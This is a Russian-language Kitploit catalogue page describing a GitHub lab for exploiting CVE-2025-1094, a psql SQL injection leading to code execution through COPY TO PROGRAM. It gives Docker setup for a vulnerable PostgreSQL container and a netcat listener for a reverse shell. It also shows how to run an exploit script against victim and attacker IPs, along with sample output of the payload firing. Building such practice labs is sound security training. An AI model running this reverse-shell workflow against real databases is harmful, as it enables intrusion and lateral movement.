Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1094-Lab-Setup — Практическая лаборатория для эксплуатации CVE-2025-1094 — SQL-инъекции в PostgreSQL psql, приводящей к RCE через COPY TO PROGRAM, с настройкой Docker и reverse shell полезной нагрузкой. | Kitploit
Инструменты/GitHubGitHub/pinkarmor/cve-2025-1094-lab-setup
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubpinkarmor/cve-2025-1094-lab-setup

CVE-2025-1094-Lab-Setup

Практическая лаборатория для эксплуатации CVE-2025-1094 — SQL-инъекции в PostgreSQL psql, приводящей к RCE через COPY TO PROGRAM, с настройкой Docker и reverse shell полезной нагрузкой.

Репозиторий
311 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛠️ Лабораторная среда CVE-2025-1094

⚠️ Дисклеймер
Данная лабораторная работа предназначена только для образовательных и исследовательских целей.
НЕ используйте информацию или методы, продемонстрированные здесь, на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Несанкционированное использование этих методов может нарушать законодательство и повлечь серьёзные последствия.


📌 Обзор

CVE-2025-1094 — это критическая уязвимость, затрагивающая интерактивный инструмент psql системы PostgreSQL, обнаруженная в версии 14.15 и более ранних.
Она позволяет злоумышленникам выполнять SQL-инъекции, которые при определённых условиях могут привести к удалённому выполнению кода (RCE).


🧨 Первопричина

Уязвимость возникает из-за некорректной обработки некорректного UTF-8 ввода в psql.
Из-за недостаточной валидации злоумышленники могут внедрять произвольные SQL-запросы или мета-команды, такие как ! (escape в оболочку), а также использовать для выполнения системных команд.

COPY ... TO PROGRAM

🔥 Влияние и сценарии атак

  • SQL-инъекция → RCE: Некорректные UTF-8 строки обходят валидацию и приводят к выполнению произвольных запросов.
  • Злоупотребление COPY TO PROGRAM: Злоумышленники могут выполнять произвольные команды оболочки, такие как:
    • Reverse shell (обратные оболочки)
    • Чтение чувствительных файлов (/etc/passwd)
    • Комбинирование с другими CVE для полного RCE без аутентификации
  • Риск интеграции: Программное обеспечение, использующее psql с недоверенным вводом (например, BeyondTrust PRA, Remote Support), особенно уязвимо.

🧪 Требования к лабораторной работе

🐳 Жертва (Ubuntu)

Установите Docker:

root@kitploit:~
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER

👉 Перезагрузитесь или выйдите из системы и войдите снова, чтобы применить разрешения группы Docker.


🐍 Атакующий (Kali)

Установите Python и зависимости:

root@kitploit:~
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional

✅ Убедитесь в наличии сетевого соединения между машинами атакующего и жертвы.


⚙️ Шаг 1 – Развёртывание уязвимого контейнера PostgreSQL (Жертва)

  1. Загрузите образ PostgreSQL 14.15:
root@kitploit:~
docker pull postgres:14.15
  1. Запустите контейнер:
root@kitploit:~
docker run --name vulnerable_postgres   -e POSTGRES_USER=postgres123   -e POSTGRES_PASSWORD=StrongP@ssWord   -e POSTGRES_DB=labdb   -p 5432:5432   -d postgres:14.15
  1. Подождите ~5 секунд для инициализации, затем создайте демонстрационную таблицу:
root@kitploit:~
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF

✅ Шаг 1.5 – Проверка контейнера и настройки базы данных

После запуска контейнера проверьте, что всё работает, с помощью следующих команд:

1. Проверьте, что контейнер PostgreSQL запущен:

root@kitploit:~
sudo docker ps

📌 Вы должны увидеть контейнер с именем vulnerable_postgres, прослушивающий порт 5432.


2. Получите доступ к контейнеру и проверьте базу данных:

root@kitploit:~
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb

Внутри оболочки psql выполните:

root@kitploit:~
SELECT * FROM users;

Ожидаемый вывод:

root@kitploit:~
 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)

Выйдите из psql:

root@kitploit:~
\q

✅ Теперь ваш уязвимый экземпляр PostgreSQL запущен и готов к эксплуатации.


3. Включите контейнер обратно

root@kitploit:~
sudo docker start vulnerable_postgres

📡 Шаг 2 – Эксплуатация с машины атакующего

  1. Запустите слушатель на машине атакующего для перехвата reverse shell:
root@kitploit:~
nc -lvnp 4444
  1. Запустите скрипт эксплойта (при необходимости измените IP и порт):
root@kitploit:~
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
  1. В случае успеха вы получите reverse shell из уязвимого контейнера PostgreSQL 🎉
root@kitploit:~
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.

🧰 Пример сценария эксплуатации

  1. Внедрение некорректного UTF-8 для обхода валидации ввода
  2. Использование COPY ... TO PROGRAM для выполнения произвольных команд оболочки
  3. Reverse shell подключается обратно к машине атакующего
  4. Повышение привилегий или горизонтальное перемещение внутри среды

💡 Совет: Вы можете создать снимок этого уязвимого контейнера и использовать его позже без повторной настройки среды.

Скачать инструмент